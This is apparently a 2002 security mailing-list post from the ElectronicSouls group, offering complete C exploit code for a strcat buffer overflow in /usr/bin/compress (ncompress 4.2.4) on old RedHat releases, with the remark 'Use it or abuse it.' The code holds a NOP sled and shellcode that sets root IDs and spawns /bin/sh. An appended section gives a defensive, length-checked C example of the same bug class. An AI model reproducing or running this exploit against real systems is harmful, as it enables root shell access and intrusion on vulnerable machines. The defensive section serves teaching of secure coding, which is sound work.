Message-ID: <200211290713.gAT7DINB054556@mailserver2.hushmail.com>
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - /usr/bin/compress exploit
-----BEGIN PGP SIGNED MESSAGE-----
Dear List,
Here is proof-of-concept code demonstrating a vulnerability in
/usr/bin/compress. Use it or abuse it.
/*
 * PROOF OF CONCEPT
 * Information System Advancement in Penetration (ISAP) Labs
 *
 * (N)compress 4.2.4 Exploit
 * By: Lunar Fault [ElectronicSouls]
 *
 * Vulnerable systems found: RedHat 6.2, 7.0, 7.1, and 7.2
 *
 * Description: Simple unchecked b0f involving strcat. This
 * exploit was tested on RedHat 6.2, 7.0, and 7.1. This is only a
 * proof of concept. /usr/bin/compress is not suid root by default.
 *
 * April 22, 2002
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen, memcpy */
#include <unistd.h>

#define VULN   "/usr/bin/compress"
#define NOP    0x90909090
#define NOPLEN 500

/* Thanx to 0x90 for the shellcode :) */
/* Shellcode does a chuid(0), chgrp(0), then executes /bin/sh */
const unsigned char linux_x86_exec_hellcode[] =
    "\x29\xc0\xb0\x46\x29\xdb\xb3\x0c\x80\xeb\x0c\x89\xd9\xcd\x80\xeb\x18\x5e\x29"
    "\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0\x0b\x87\xf3\x8d\x4b\x08\x8d\x53"
    "\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

/* Returns the current stack pointer. There is no explicit return statement;
 * the value left in %eax is what the caller receives (unoptimised gcc, x86). */
unsigned long get_sp(void)
{
    __asm__(" mov %esp, %eax");
}

void usage(char *prog)
{
    printf("<+> (N)compress 4.2.4 Exploit\n");
    printf("<+> By: Lunar Fault [ElectronicSouls]\n");
    printf("<+> Information System Advancement in Penetration (ISAP) Labs\n");
    printf("<!> usage: %s [options]\n", prog);
    printf("\t\t-h help\n");
    printf("\t\t-o <offset> Example: 100\n");
    printf("\t\t-r <return> Example: 0xbfffc680\n");
    printf("\t\t-s <size> Example: 1056\n");
    exit(1);
}

/* Note: the parameter names are swapped relative to the usual convention;
 * here argv is the argument count and argc the argument vector. */
int main(int argv, char *argc[])
{
    int i, c, ret, offset;
    long len;
    char *buffer;

    offset = 0;
    len = 1056;
    ret = get_sp();
    ret = ret - 250; /* Subtracting 250 from sp to bring the return somewhere in the NOP */

    printf("<+> (N)compress 4.2.4 Exploit\n");
    printf("<+> By: Lunar Fault [ElectronicSouls]\n");
    printf("<+> Information System Advancement in Penetration (ISAP) Labs\n");

    if (argv > 1) {
        while ((c = getopt(argv, argc, "r:s:o:h")) != EOF) {
            switch (c) {
            case 'r':
                ret = strtoll(optarg, NULL, 0);
                break;
            case 's':
                len = atoi(optarg);
                if (len < (NOPLEN + strlen((const char *)linux_x86_exec_hellcode) + 100)) {
                    printf("<!> Size is too small to work\n");
                    exit(1);
                }
                break;
            case 'o':
                offset = atoi(optarg);
                break;
            case 'h':
                usage(argc[0]);
            }
        }
    }

    buffer = (char *) malloc(len);
    ret = ret + offset;

    /* Fill the whole buffer with NOPs, then overwrite everything past the
     * NOP sled with the chosen return address. */
    for (i = 0; i < len; i += 4)
        *(long *) &buffer[i] = NOP;
    for (i = NOPLEN; i < len; i += 4)
        *(long *) &buffer[i] = ret;
    /* Place the shellcode right after the NOP sled. */
    memcpy(buffer + NOPLEN, linux_x86_exec_hellcode, strlen((const char *)linux_x86_exec_hellcode));

    printf("<*> Offset = %d\n", offset);
    printf("<*> Return = 0x%.8x\n", ret);
    printf("<*> Size = %ld\n\n", len);

    execl(VULN, VULN, buffer, (char *) 0);
    return 0;
}
The Electronic Souls Crew
[ElectronicSouls] (c) 2002
"The end is now."
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify
wlMEARECABMFAj3nE50MHGVzQGh1c2guY29tAAoJEN5nGqhGcjlt2zUAoKzlEfXzhbiX
0IwM3GWiRfyNWub8AJ4zOt0daZO93e2HHyokvrfcS/vTQQ==
=ABKy
-----END PGP SIGNATURE-----
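The header comment above describes the bug class only as "an unchecked b0f involving strcat". The following is an added example, not code from the post or from the ncompress project, that shows that class from the defender's side: a fixed-size filename buffer receives a name plus a suffix, once with the unchecked strcpy/strcat pattern and once with a length check that refuses input that would not fit. The buffer size, the ".Z" suffix and the function names are assumptions chosen for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NAME_BUF_LEN 1024   /* assumed fixed output buffer size, for illustration */

/* Vulnerable pattern: copy the name, then append the suffix, without ever
 * consulting the destination size. Once strlen(name) + strlen(suffix) + 1
 * exceeds outsz the write runs past 'out' into whatever sits beyond it. */
void append_suffix_unchecked(char *out, size_t outsz, const char *name, const char *suffix)
{
    (void)outsz;              /* size is known to the caller but never checked */
    strcpy(out, name);
    strcat(out, suffix);
}

/* Hardened form: compute the required length up front and reject the input
 * outright rather than truncating it (a silently truncated name can itself
 * cause surprises). Returns 0 on success, -1 if the result would not fit. */
int append_suffix_checked(char *out, size_t outsz, const char *name, const char *suffix)
{
    size_t nlen = strlen(name);
    size_t slen = strlen(suffix);

    if (nlen > outsz || slen > outsz - nlen || nlen + slen + 1 > outsz)
        return -1;            /* arithmetic ordered so it cannot wrap */

    memcpy(out, name, nlen);
    memcpy(out + nlen, suffix, slen + 1);   /* +1 copies the terminator */
    return 0;
}

/* Builds "<name>.Z" into a stack buffer of NAME_BUF_LEN bytes using the
 * checked variant; reports whether the input was accepted. */
int build_output_name(const char *name, char *result, size_t resultsz)
{
    char buf[NAME_BUF_LEN];

    if (append_suffix_checked(buf, sizeof buf, name, ".Z") != 0)
        return -1;
    if (strlen(buf) + 1 > resultsz)
        return -1;
    memcpy(result, buf, strlen(buf) + 1);
    return 0;
}

int main(void)
{
    char out[NAME_BUF_LEN];
    size_t biglen = NAME_BUF_LEN + 100;          /* constructed over-long name */
    char *longname = malloc(biglen + 1);

    if (longname == NULL)
        return 1;
    memset(longname, 'A', biglen);
    longname[biglen] = '\0';

    if (build_output_name("archive.tar", out, sizeof out) == 0)
        printf("accepted: %s\n", out);
    if (build_output_name(longname, out, sizeof out) != 0)
        printf("rejected: %zu-byte name does not fit in a %d-byte buffer\n",
               strlen(longname), NAME_BUF_LEN);

    free(longname);
    return 0;
}
```

The unchecked function is never called with over-long input here; it is present only so the two shapes can be compared side by side. In a real code base the same fix is to replace every strcpy/strcat into a fixed buffer with a length-checked copy (or snprintf with its return value inspected) and to reject, not truncate, names that do not fit.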